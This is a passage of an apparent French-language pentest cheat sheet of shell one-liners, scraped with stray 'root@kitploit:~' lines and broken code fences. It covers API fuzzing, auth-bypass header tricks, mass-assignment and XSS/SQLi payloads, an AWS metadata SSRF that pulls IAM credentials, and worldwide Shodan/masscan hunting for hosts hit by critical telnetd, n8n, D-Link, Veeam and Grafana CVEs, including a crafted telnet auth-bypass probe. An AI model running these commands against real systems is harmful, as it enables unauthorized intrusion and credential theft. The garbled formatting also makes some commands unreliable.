nuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txt

root@kitploit:~
### Mode DAST```bash
nuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txt

Balises personnalisées```bash

nuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txt

root@kitploit:~
### Scan réseau```bash
nuclei -l ips.txt -t network/ -c 25 -o network_vulns.txt

🔌 Tests de sécurité des API

Introspection GraphQL```bash

cat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"

root@kitploit:~
### REST API Énumération```bash
cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txt

Analyse JWT```bash

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-].eyJ[A-Za-z0-9_-].[A-Za-z0-9_-]*" | anew jwts.txt

root@kitploit:~
### API Key Fuite```bash
cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt

Authentification défaillante```bash

Test endpoints without auth

cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txt

root@kitploit:~
### Test de limitation de débit```bash
for i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -c

BOLA/IDOR Tests```bash

cat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txt

root@kitploit:~
### 💀 Fuzzing d'endpoints API avec ffuf```bash
# ☠️ Fuzz API endpoints with common paths and methods
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,204,301,302,401,403,405 -ac -c -t 100 -H "Content-Type: application/json" -o api_fuzz.json -of json

💀 Fuzzing des versions d'API```bash

☠️ Discover hidden API versions

ffuf -u https://target.com/api/vFUZZ/users -w <(seq 1 20) -mc 200,201,401,403 -ac -c && ffuf -u https://target.com/FUZZ/users -w <(echo -e "api\nv1\nv2\nv3\nv4\napi/v1\napi/v2\napi/v3\napi/internal\napi/private\napi/admin\napi/dev\napi/test\napi/staging\napi/beta") -mc 200,201,401,403 -ac -c

root@kitploit:~
### 💀 Fuzzing des méthodes d'API REST```bash
# ☠️ Test all HTTP methods on API endpoints
cat api_endpoints.txt | while read url; do for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X $method "$url" -H "Content-Type: application/json"); echo "$method $url - $CODE"; done; done | grep -vE " - (404|405)$" | anew api_methods.txt

💀 Fuzzing GraphQL avec ffuf```bash

☠️ Fuzz GraphQL endpoints for introspection and queries

ffuf -u https://target.com/FUZZ -w <(echo -e "graphql\ngraphiql\nplayground\nconsole\nquery\ngql\nv1/graphql\nv2/graphql\napi/graphql\napi/gql") -mc 200,400 -ac -c -H "Content-Type: application/json" -d '{"query":"{__typename}"}' -X POST -o graphql_endpoints.json

root@kitploit:~
### 💀 API Parameter Fuzzing```bash
# ☠️ Discover hidden API parameters with arjun + ffuf combo
cat api_endpoints.txt | xargs -I@ -P5 arjun -u @ -m POST -oT arjun_params.txt && cat api_endpoints.txt | xargs -I@ ffuf -u @?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mc 200,201,400,500 -ac -c -t 50 -o param_fuzz.json

💀 Fuzzing de contournement d'authentification API```bash

☠️ Test auth bypass techniques on protected endpoints

cat api_endpoints.txt | while read url; do curl -s -o /dev/null -w "%{http_code} - $url\n" "$url" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -H "X-Remote-IP: 127.0.0.1" -H "X-Remote-Addr: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1"; done | grep "^200" | anew auth_bypass.txt

root@kitploit:~
### 💀 Fuzzing OpenAPI/Swagger```bash
# ☠️ Find and extract endpoints from OpenAPI specs
ffuf -u https://target.com/FUZZ -w <(echo -e "swagger.json\nswagger.yaml\nopenapi.json\nopenapi.yaml\napi-docs\napi-docs.json\nswagger-ui.html\nswagger/v1/swagger.json\nv1/swagger.json\nv2/swagger.json\nv3/swagger.json\napi/swagger.json\ndocs/api\napi/docs") -mc 200 -ac -c | tee swagger_found.txt | xargs -I@ curl -s @ | jq -r '.paths | keys[]' 2>/dev/null | anew swagger_paths.txt

💀 Fuzzing JSON d'API avec Nuclei```bash

☠️ Mass API fuzzing with nuclei DAST mode

cat api_endpoints.txt | httpx -silent -mc 200,201,401,403 | nuclei -dast -t dast/vulnerabilities/ -H "Content-Type: application/json" -rl 20 -c 5 -o api_nuclei_dast.txt

root@kitploit:~
### 💀 Fuzzing d'attribution massive d'API```bash
# ☠️ Test for mass assignment vulnerabilities
cat api_endpoints.txt | grep -iE "(user|account|profile|register|signup|update)" | xargs -I@ curl -s -X POST @ -H "Content-Type: application/json" -d '{"admin":true,"role":"admin","isAdmin":true,"is_admin":1,"privilege":"admin","access_level":9999}' -o /dev/null -w "%{http_code} - @\n" | grep -E "^(200|201|204)" | anew mass_assignment.txt

💀 API FUZZ avec génération de liste de mots personnalisée```bash

☠️ Generate API wordlist from JS files and fuzz

cat js.txt | xargs -I@ curl -s @ | grep -oE "["']/(api|v[0-9])/[a-zA-Z0-9/_-]+["']" | tr -d ""'" | sort -u > custom_api_wordlist.txt && ffuf -u https://target.com/FUZZ -w custom_api_wordlist.txt -mc 200,201,204,401,403,500 -ac -c -t 80 -H "Authorization: Bearer null" -o custom_api_fuzz.json

root@kitploit:~
## ☁️ Sécurité Cloud

### AWS S3 Bucket Finder```bash
cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt

Vérification des permissions S3```bash

cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'

root@kitploit:~
### Base de données Firebase```bash
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"

Azure Blob Storage```bash

cat urls.txt | grep -oE "[a-zA-Z0-9-]+.blob.core.windows.net" | anew azure_blobs.txt

root@kitploit:~
### Stockage GCP```bash
cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt

Métadonnées AWS SSRF```bash

cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"

root@kitploit:~
### Fichiers d'identifiants cloud```bash
cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt

🤖 Scripts d'Automatisation

Pipeline de Reconnaissance Complet```bash

#!/bin/bash domain=$1 mkdir -p $domain && cd $domain

Subdomains

subfinder -d $domain -all -silent | anew subs.txt amass enum -passive -d $domain | anew subs.txt assetfinder -subs-only $domain | anew subs.txt

Alive check

cat subs.txt | httpx -silent -threads 100 | anew alive.txt

URLs

cat alive.txt | katana -d 5 -jc -silent | anew urls.txt cat alive.txt | waybackurls | anew urls.txt cat alive.txt | gau --threads 50 | anew urls.txt

Vulnerability patterns

cat urls.txt | gf xss | anew xss.txt cat urls.txt | gf sqli | anew sqli.txt cat urls.txt | gf ssrf | anew ssrf.txt cat urls.txt | gf lfi | anew lfi.txt

Nuclei scan

nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt

root@kitploit:~
### XSS Hunter Script```bash
#!/bin/bash
target=$1
echo $target | waybackurls | anew urls.txt
echo $target | gau | anew urls.txt
cat urls.txt | gf xss | uro | qsreplace '">' | airixss -payload "alert(1)" | tee xss_found.txt
cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt

Script de reconnaissance API```bash

#!/bin/bash target=$1 mkdir -p $target/api && cd $target/api

Find API endpoints

cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt

Extract from JS

cat ../js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^"'`\s<>]+)" | sort -u | anew js_api_endpoints.txt

Test GraphQL

cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt

echo "[+] API recon complete!"

root@kitploit:~
---

## ⚙️ Fonctions Bash

Ajoutez à votre `.bashrc` ou `.zshrc`:```bash
# Quick recon
recon() {
    subfinder -d $1 -silent | anew subs.txt
    assetfinder -subs-only $1 | anew subs.txt
    cat subs.txt | httpx -silent | anew alive.txt
    echo "[+] Found $(wc -l < alive.txt) alive hosts"
}

# XSS scan
xscan() {
    echo $1 | waybackurls | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
}

# SQLi scan
sqscan() {
    echo $1 | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -ms "error|syntax|mysql"
}

# JS recon
jsrecon() {
    echo $1 | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/
}

# Nuclei quick
nuke() {
    echo $1 | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
}

# Full pipeline
fullrecon() {
    recon $1
    cat alive.txt | katana -d 3 -jc -silent | anew urls.txt
    cat urls.txt | gf xss | anew xss.txt
    cat urls.txt | gf sqli | anew sqli.txt
    nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
}

# Certificate search
cert() {
    curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}

# Parameter extraction
params() {
    echo $1 | waybackurls | grep "=" | uro | unfurl keys | sort -u
}

# Subdomain takeover check
takeover() {
    subfinder -d $1 -silent | httpx -silent | nuclei -t takeovers/ -c 50
}

# Port scan
portscan() {
    naabu -host $1 -top-ports 1000 -silent | httpx -silent | anew $1_ports.txt
}

# Screenshot all
screenshot() {
    cat $1 | xargs -I@ gowitness single @ -o screenshots/
}

🆕 Nouveaux One-liners 2026

⚡🔥⚡ TelnetPwn - CVE-2026-24061 (CVSS 9.8 - CRITIQUE) ⚡🔥⚡

💀 Contournement de l'authentification Telnetd GNU InetUtils - Shell Root Instantané ! Actuellement exploité ! 💀

⚡ 1. Découverte massive Telnet via Shodan```bash

💀 Find exposed telnet servers worldwide

shodan search "port:23 telnet" --fields ip_str,port,org | awk '{print $1":"$2}' | anew telnet_targets.txt

root@kitploit:~
#### ⚡ 2. Nmap Telnet Détection de service + Version```bash
# 💀 Enumerate telnet services with version detection
nmap -p23 -sV --script=telnet-ntlm-info -iL targets.txt -oG - | grep "23/open" | awk '{print $2}' | anew telnet_open.txt

⚡ 3. Masscan Balayage Rapide Telnet```bash

💀 Ultra-fast telnet port discovery on large ranges

masscan -p23 --rate=10000 -iL ip_ranges.txt -oG masscan_telnet.txt && cat masscan_telnet.txt | grep "23/open" | awk '{print $4}' | anew telnet_alive.txt

root@kitploit:~
#### ⚡ 4. GNU InetUtils Telnetd Fingerprint```bash
# 💀 Identify GNU inetutils-telnetd specifically (vulnerable)
cat telnet_targets.txt | xargs -P30 -I@ sh -c 'echo "" | timeout 3 nc -v @ 23 2>&1 | grep -qi "GNU\|inetutils\|Ubuntu\|Debian" && echo "[GNU TELNETD] @"' | tee gnu_telnetd.txt

⚡ 5. Vérification de vulnérabilité CVE-2026-24061 (Sûr)```bash

💀 Test for NEW_ENVIRON option support (vuln indicator)

cat telnet_targets.txt | xargs -P20 -I@ sh -c 'echo -e "\xff\xfa\x27\x00\x00USER\x01-f\xff\xf0" | timeout 3 nc @ 23 2>/dev/null | grep -q "login|root|#" && echo "[CVE-2026-24061 POTENTIAL] @"' | tee cve_2026_24061_potential.txt

root@kitploit:~
#### ⚡ 6. Nuclei CVE-2026-24061 Scanneur```bash
# 💀 Mass scan with Nuclei template
cat telnet_targets.txt | nuclei -t http/cves/2026/CVE-2026-24061.yaml -c 50 -o cve_2026_24061_vuln.txt

⚡ 7. Capture de bannière + Extraction de version```bash

💀 Extract telnet banners for version analysis

cat telnet_targets.txt | xargs -P50 -I@ sh -c 'echo "" | timeout 3 nc @ 23 2>&1 | head -3' | tee telnet_banners.txt | grep -iE "(inetutils|GNU|2.[0-7])" | anew potentially_vuln_versions.txt

root@kitploit:~
#### ⚡ 8. Chasseur Telnet de Sous-réseau```bash
# 💀 Discover telnet in internal/external subnets
prips 192.168.0.0/16 | xargs -P100 -I@ sh -c 'timeout 1 nc -zv @ 23 2>&1 | grep -q "succeeded\|open" && echo @' | anew internal_telnet.txt

⚡ 9. Telnet + Corrélation d'empreinte OS```bash

💀 Correlate telnet with vulnerable OS (Debian/Ubuntu/Kali)

nmap -p23 -sV -O --script=telnet-encryption -iL telnet_targets.txt -oX telnet_scan.xml && cat telnet_scan.xml | grep -oE "(Debian|Ubuntu|Kali|Linux)" | sort | uniq -c | sort -rn

root@kitploit:~
#### ⚡ 10. Pipeline de reconnaissance complet CVE-2026-24061```bash
# 💀 Complete telnet vulnerability assessment pipeline
TARGET_RANGE="192.168.1.0/24"; mkdir -p telnet_recon && cd telnet_recon; masscan -p23 --rate=5000 $TARGET_RANGE -oG masscan.txt; cat masscan.txt | grep "23/open" | awk '{print $4}' > telnet_hosts.txt; cat telnet_hosts.txt | xargs -P30 -I@ sh -c 'echo "" | timeout 3 nc @ 23 2>&1 | head -5' > banners.txt; grep -liE "(GNU|inetutils|ubuntu|debian)" banners.txt | xargs -I@ basename @ .txt > gnu_telnetd_hosts.txt; echo "[+] Found $(wc -l < telnet_hosts.txt) telnet | $(wc -l < gnu_telnetd_hosts.txt) GNU inetutils (potentially vulnerable)"

⚠️ Affecté : GNU InetUtils telnetd 1.9.3 - 2.7 (Debian/Ubuntu/Kali/Trisquel) ✅ Correctif : Mettez à jour vers GNU InetUtils 2.8+ ou désactivez telnetd et utilisez SSH


⚡🔥⚡ Ni8mare - CVE-2026-21858 (CVSS 10.0 - CRITIQUE) ⚡🔥⚡

💀 RCE critique non authentifiée dans n8n Workflow Automation - Plus de 100 000 serveurs affectés ! Ajouté au KEV de la CISA 💀

⚡ Détecter les instances n8n (Shodan/Censys)```bash

shodan search "n8n" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew n8n_targets.txt

root@kitploit:~
#### ⚡ Empreinte des installations n8n```bash
cat alive.txt | httpx -silent -match-string "n8n" -match-string "workflow" -title | grep -i "n8n" | anew n8n_instances.txt

⚡ Vérifier les points de terminaison Webhook vulnérables```bash

cat n8n_targets.txt | xargs -I@ -P20 sh -c 'curl -s -o /dev/null -w "%{http_code}" -X POST @/webhook-test/test -H "Content-Type: multipart/form-data" 2>/dev/null | grep -qE "^(200|400|500)$" && echo "POTENTIAL: @"' | tee n8n_webhook_check.txt

root@kitploit:~
#### ⚡ Détection de confusion Content-Type```bash
curl -s -X POST "https://target.com/webhook/ID" -H "Content-Type: application/json" --data '{"test":1}' -w "\n%{http_code}" | tail -1 | grep -qE "^(200|400)$" && echo "Webhook accepts requests"

⚡ Détection de version en masse n8n```bash

cat n8n_targets.txt | httpx -silent -path /rest/settings -match-regex '"versionCli":"[0-9]+.[0-9]+.[0-9]+"' | anew n8n_versions.txt

root@kitploit:~
#### ⚡ Vérification de modèle Nuclei pour CVE-2026-21858```bash
nuclei -l n8n_targets.txt -t http/cves/2026/CVE-2026-21858.yaml -c 30 -o ni8mare_vuln.txt

⚠️ Affecté : n8n < 1.121.0 | ✅ Correctif : Mettre à jour vers n8n 1.121.0+


⚡🔥⚡ N8n Authentification RCE - CVE-2026-21877 (CVSS 10.0 - CRITIQUE) ⚡🔥⚡

💀 RCE authentifié via Git Node dans n8n - Cloud & auto-hébergé affectés ! 💀

⚡ Détecter les instances avec Git Node activé```bash

cat n8n_targets.txt | httpx -silent -path /rest/node-types -match-string "git" | anew n8n_git_enabled.txt

root@kitploit:~
#### ⚡ Vérifier les points d'authentification n8n```bash
cat n8n_targets.txt | httpx -silent -path /rest/login -mc 200,401 -title | anew n8n_auth_endpoints.txt

⚠️ Affecté : n8n < 1.121.3 | ✅ Correctif : Mettre à jour vers n8n 1.121.3+


⚡🔥⚡ RCE sur D-Link DSL - CVE-2026-0625 (CVSS 9.3 - CRITIQUE) ⚡🔥⚡

💀 Injection de commandes dans les routeurs D-Link DSL hérités - Exploitation active en cours ! 💀

⚡ Dork Shodan pour les routeurs D-Link DSL```bash

shodan search "D-Link DSL" --fields ip_str,port | awk '{print $1":"$2}' | httpx -silent | anew dlink_dsl_targets.txt

root@kitploit:~
#### ⚡ Détecter un point de terminaison dnscfg.cgi vulnérable```bash
cat dlink_dsl_targets.txt | httpx -silent -path /dnscfg.cgi -mc 200,401 | anew dlink_dnscfg.txt

⚡ Empreinte massive D-Link```bash

cat alive.txt | httpx -silent -match-string "D-Link" -match-string "DSL" -title -tech-detect | anew dlink_routers.txt

root@kitploit:~
> **⚠️ Affecté :** Routeurs de passerelle DSL D-Link hérités (EOL) | **✅ Correctif :** Remplacer par des appareils pris en charge

---

### ⚡🔥⚡ Veeam Backup RCE - CVE-2025-59470 (CVSS 9.0 - CRITIQUE) ⚡🔥⚡

> **💀 RCE via injection de paramètre Postgres dans Veeam Backup & Replication 💀**

#### ⚡ Détecter les serveurs Veeam Backup```bash
shodan search "Veeam" --fields ip_str,port | awk '{print "https://"$1":"$2}' | httpx -silent | anew veeam_targets.txt

⚡ Empreinte des instances Veeam```bash

cat alive.txt | httpx -silent -match-string "Veeam" -title -tech-detect | grep -i "veeam" | anew veeam_instances.txt

root@kitploit:~
> **⚠️ Affecté :** Veeam B&R 13.0.1.180 et versions antérieures | **✅ Correctif :** Mettre à jour vers 13.0.1.1071+

---

### ⚡🔥⚡ Grafana Ghost XSS - CVE-2025-4123 (GRAVITÉ ÉLEVÉE) ⚡🔥⚡

> **💀 Zero-Day XSS dans Grafana - 46,500+ instances encore vulnérables ! Prise de contrôle de compte possible 💀**

#### ⚡ Trouver des instances Grafana```bash
shodan search "Grafana" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew grafana_targets.txt

⚡ Détecter la version de Grafana```bash

cat grafana_targets.txt | httpx -silent -path /api/frontend/settings -match-regex '"version":"[0-9]+.[0-9]+.[0-9]+"' | anew grafana_versions.txt

root@kitploit:~
#### ⚡ Vérifier Open Redirect (CVE-2025-4123 vecteur)```bash
cat grafana_targets.txt | xargs -I@ sh -c 'curl -sI "@/login?redirect=//" 2>/dev/null | grep -i "location" && echo "CHECK: @"' | tee grafana_redirect_check.txt

⚡ Détection massive de pages de connexion Grafana```bash

cat alive.txt | httpx -silent -path /login -match-string "Grafana" -title | anew grafana_logins.txt

root@kitploit:~
> **⚠️ Affecté:** Plusieurs versions de Grafana | **✅ Correctif:** Mettre à jour vers la dernière version corrigée

---

### ⚡🔥⚡ CVE-2026 Chasse aux sous-domaines - Pipeline de détection de masse ⚡🔥⚡

> **💀 10 one-liners pour chasser les vulnérabilités CVE-2026 à travers les sous-domaines à grande échelle ! 💀**

#### ⚡ 1. Pipeline complet de chasse aux sous-domaines CVE-2026 (n8n + Grafana + D-Link)```bash
subfinder -d target.com -silent | httpx -silent -title -tech-detect | tee alive_subs.txt | while read line; do echo "$line" | grep -qiE "(n8n|grafana|d-link)" && echo "[CVE-2026 TARGET] $line"; done | anew cve2026_targets.txt

⚡ 2. Détection massive de n8n CVE-2026-21858 sur les sous-domaines```bash

subfinder -d target.com -silent | httpx -silent | xargs -I@ -P30 sh -c 'curl -s "@/rest/settings" 2>/dev/null | grep -q "versionCli" && echo "[N8N FOUND] @"' | tee n8n_subs.txt | xargs -I@ nuclei -u @ -t http/cves/2026/CVE-2026-21858.yaml -silent

root@kitploit:~
#### ⚡ 3. CVE-2026-21877 n8n Git Node RCE Scanneur de sous-domaines```bash
cat subdomains.txt | httpx -silent | xargs -I@ -P20 sh -c 'curl -s "@/rest/node-types" 2>/dev/null | grep -qi "git" && curl -s "@/rest/settings" 2>/dev/null | grep -qE "versionCli.*1\.(([0-9]|[0-9][0-9]|1[01][0-9]|120)\.[0-9]+)" && echo "[CVE-2026-21877 VULN] @"' | anew n8n_git_vuln.txt

⚡ 4. Grafana CVE-2025-4123 XSS + Open Redirect Chasse aux sous-domaines```bash

subfinder -d target.com -silent | httpx -silent -path /api/frontend/settings -match-regex '"version":"' | tee grafana_subs.txt | xargs -I@ -P15 sh -c 'curl -sI "@/login?redirect=//evil.com" 2>/dev/null | grep -qi "location.*evil" && echo "[CVE-2025-4123 VULN] @"'

root@kitploit:~
#### ⚡ 5. Scanner multi-CVE-2026 avec Nuclei (Modèles parallèles)```bash
subfinder -d target.com -silent | httpx -silent | nuclei -tags cve2026 -severity critical,high -c 50 -o cve2026_nuclei_results.txt

⚡ 6. Sous-domaine n8n Webhook Fingerprint + Vérification CVE-2026-21858```bash

cat subdomains.txt | httpx -silent | xargs -I@ -P25 sh -c 'for path in /webhook /webhook-test /rest/workflows; do curl -s -o /dev/null -w "%{http_code}" "@$path" 2>/dev/null | grep -qE "^(200|401|403)$" && echo "[N8N ENDPOINT] @$path" && break; done' | anew n8n_webhooks.txt

root@kitploit:~
#### ⚡ 7. Chasse aux IoT/routeurs CVE-2026 (D-Link DSL + autres routeurs)```bash
subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -iE "(d-link|router|gateway|modem|dsl)" | tee router_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/dnscfg.cgi" 2>/dev/null | grep -qi "dns" && echo "[CVE-2026-0625 POTENTIAL] @"'

⚡ 8. Veeam CVE-2025-59470 Détection de sous-domaine```bash

subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -i "veeam" | tee veeam_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/api/v1/version" 2>/dev/null | grep -qE "13.0.[01].[0-9]+" && echo "[CVE-2025-59470 VULN] @"'

root@kitploit:~
#### ⚡ 9. Combiné Empreinte CVE-2026 + Extracteur de version```bash
subfinder -d target.com -silent | httpx -silent -json | jq -r 'select(.technologies != null) | "\(.url) \(.technologies[])"' | grep -iE "(n8n|grafana|veeam|next)" | while read url tech; do echo "[CVE-2026 CHECK] $url - $tech"; done | anew cve2026_tech_fingerprint.txt

⚡ 10. Script complet d'automatisation de reconnaissance pour CVE-2026```bash

domain="target.com"; mkdir -p recon_$domain && cd recon_$domain && subfinder -d $domain -silent | httpx -silent -title -tech-detect -json -o httpx_out.json && cat httpx_out.json | jq -r '.url' | nuclei -t ~/nuclei-templates/http/cves/2026/ -c 30 -o cve2026_vulns.txt && echo "[+] Found $(wc -l < cve2026_vulns.txt) CVE-2026 vulnerabilities!"

root@kitploit:~
> **🎯 Astuce Pro :** Combinez avec `notify` pour obtenir des alertes en temps réel : `... | notify -silent -provider slack`

---

### ⚡🔥⚡ Pipeline de Reconnaissance Avancée - Édition 2026 ⚡🔥⚡

> **🎯 10 Oneliners d'élite pour une reconnaissance complète - Énumération multi-source, découverte ASN, analyse JS et plus encore ! 🎯**

#### ⚡ 1. Découverte de Sous-domaines Multi-Source + Empreinte Technologique```bash
subfinder -d target.com -all -silent | anew subs.txt && assetfinder --subs-only target.com | anew subs.txt && amass enum -passive -norecursive -noalts -d target.com | anew subs.txt && cat subs.txt | httpx -silent -threads 200 -tech-detect -status-code -title -o alive_with_tech.txt

Combine Subfinder + Assetfinder + Amass pour une couverture maximale des sous-domaines, puis valide avec httpx + empreinte technologique

⚡ 2. Énumération ASN + Découverte DNS inversé```bash

echo "target.com" | dnsx -silent -resp-only -a | xargs -I{} whois -h whois.cymru.com {} | awk '{print $1}' | grep -E "AS[0-9]+" | xargs -I{} sh -c 'whois -h whois.radb.net -- "-i origin {}" | grep -Eo "([0-9.]+){4}/[0-9]+"' | mapcidr -silent | dnsx -silent -ptr -resp-only | anew asn_discovered_hosts.txt

root@kitploit:~
> Découvre les ASN, énumère les blocs IP, effectue un reverse DNS pour trouver des sous-domaines cachés

#### ⚡ 3. URL Discovery Pipeline (Wayback + GAU + Katana)```bash
cat alive.txt | xargs -P 50 -I{} sh -c 'echo {} | waybackurls & echo {} | gau --threads 10 --blacklist png,jpg,gif,svg,woff,ttf & echo {} | katana -d 3 -jc -kf all -silent' | uro | anew all_urls.txt

Collecte parallèle d'URL depuis Wayback Machine, Common Crawl, AlienVault + crawling actif avec déduplication intelligente

⚡ 4. Analyse approfondie JavaScript + Secret Scanner```bash

cat alive.txt | katana -silent -em js,json -jc -d 2 | httpx -silent -mc 200 | tee js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} | tee /tmp/js_$$.tmp | grep -oE "(api_key|apikey|api-key|secret|token|password|aws_access|AKIA[0-9A-Z]{16})" && cat /tmp/js_$$.tmp | grep -oE "/(api|v[0-9]|admin|internal)/[a-zA-Z0-9_/?=&-]+" | sort -u' | anew js_secrets_and_endpoints.txt

root@kitploit:~
> Trouve des fichiers JS, extrait les secrets codés en dur (clés API, jetons, clés AWS) et les points d'accès API cachés

#### ⚡ 5. Certificate Transparency + Subdomain Permutation Attack```bash
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee crt_subs.txt | dnsgen - | shuffledns -d target.com -r /usr/share/wordlists/resolvers.txt -silent -o permuted_subs.txt && cat permuted_subs.txt | httpx -silent -o alive_permuted.txt

Énumération des logs CT + permutation intelligente (api → api-dev, api-staging) avec résolution DNS de masse

⚡ 6. Découverte de ports + Services web sur des ports non standards```bash

cat subs.txt | naabu -silent -top-ports 1000 -exclude-cdn -c 50 | sed 's/:/ /g' | awk '{print $1":"$2}' | httpx -silent -probe -status-code -title -tech-detect -follow-redirects -random-agent -o ports_with_web_services.txt

root@kitploit:~
> Scan rapide de ports + découvre les applications web tournant sur des ports inhabituels (8080, 8443, 3000, etc)

#### ⚡ 7. Automatisation du GitHub Dorking pour l'organisation cible```bash
ORG="target"; for dork in "org:$ORG password" "org:$ORG api_key" "org:$ORG secret" "org:$ORG token" "org:$ORG aws_access" "org:$ORG credentials"; do echo "[+] Searching: $dork"; gh search repos "$dork" --limit 100 | grep "^$ORG" | tee -a github_secrets.txt; sleep 2; done

Dorking automatisé de GitHub pour la recherche de secrets, d'identifiants et d'exposition de données sensibles

⚡ 8. Découverte de stockage cloud (S3 + Azure + GCP)```bash

cat all_urls.txt | grep -oE '(s3.amazonaws.com/[a-zA-Z0-9.-]+|[a-zA-Z0-9.-]+.s3.amazonaws.com|storage.googleapis.com/[a-zA-Z0-9.-]+|[a-zA-Z0-9.-]+.blob.core.windows.net)' | sort -u | tee cloud_buckets.txt | xargs -I{} sh -c 'curl -sI https://{} | grep -q "200|403" && echo "[+] {} - Accessible"'

root@kitploit:~
> Extrait et valide les buckets de stockage cloud mal configurés à partir des URLs collectées

#### ⚡ 9. Découverte de paramètres + Correspondance de modèles de vulnérabilité```bash
cat all_urls.txt | uro | grep "=" | unfurl keys | sort -u | tee all_params.txt && cat all_urls.txt | gf xss | tee xss_params.txt && cat all_urls.txt | gf ssrf | tee ssrf_params.txt && cat all_urls.txt | gf sqli | tee sqli_params.txt && cat all_urls.txt | gf redirect | tee redirect_params.txt

Extrait les paramètres uniques et catégorise par type de vulnérabilité (XSS, SSRF, SQLi, Redirect)

⚡ 10. Moniteur de Reconnaissance Continue (Prêt pour Cron)```bash

DOMAIN="target.com"; DATE=$(date +%Y%m%d); mkdir -p recon_$DATE; cd recon_$DATE; subfinder -d $DOMAIN -all -silent | anew subs_$DATE.txt; cat subs_$DATE.txt | httpx -silent -threads 200 -o alive_$DATE.txt; cat alive_$DATE.txt | nuclei -t exposures/ -silent -o new_exposures_$DATE.txt; diff ../recon_$(date -d "yesterday" +%Y%m%d)/subs_*.txt subs_$DATE.txt 2>/dev/null | grep ">" | awk '{print $2}' > new_subs_$DATE.txt; [ -s new_subs_$DATE.txt ] && notify -silent -bulk < new_subs_$DATE.txt

root@kitploit:~
> Pipeline de recon persistante complet - détecte les nouveaux actifs quotidiennement et envoie des notifications

> **🎯 Conseil Pro :** Exécutez la oneliner #10 via cron pour une surveillance 24h/24 et 7j/7 : `0 */6 * * * /path/to/recon_monitor.sh`

---

### ⚡🔥⚡ Extraction d'Endpoints JavaScript - Techniques d'Élite 2026 ⚡🔥⚡

> **🎯 10 Oneliners pour extraire les endpoints, secrets et APIs cachées des fichiers JavaScript ! 🎯**

#### ⚡ 1. Découverte Massive de Fichiers JS + Pipeline de Téléchargement```bash
cat alive.txt | katana -silent -em js -jc -d 3 | grep -E "\.js(\?|$)" | httpx -silent -mc 200 -content-length | awk '$NF > 500 {print $1}' | anew js_files.txt && cat js_files.txt | xargs -P 30 -I{} sh -c 'curl -sk {} -o js_downloaded/$(echo {} | md5sum | cut -d" " -f1).js 2>/dev/null'

Découvre tous les fichiers JS avec Katana, filtre par taille (>500 bytes), télécharge pour analyse hors ligne

⚡ 2. Extraire tous les points de terminaison API des fichiers JS```bash

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null' | grep -oE '"'"'"'?)['"'"'"]' | sed 's/["'"'"']//g' | sort -u | grep -E "^/" | grep -vE ".(css|png|jpg|svg|gif|woff|ico)$" | anew js_endpoints.txt

root@kitploit:~
> Extrait tous les chemins API relatifs depuis JavaScript, filtre les ressources statiques

#### ⚡ 3. AWS Keys Hunter in JS Files```bash
